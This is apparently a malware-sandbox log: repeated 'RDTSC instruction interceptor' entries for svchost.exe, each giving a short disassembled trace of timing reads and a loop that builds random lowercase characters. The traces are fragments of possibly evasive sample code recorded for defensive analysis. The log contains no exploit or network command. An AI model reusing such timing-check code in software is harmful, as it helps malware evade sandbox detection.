Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59513h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59550h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59504h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
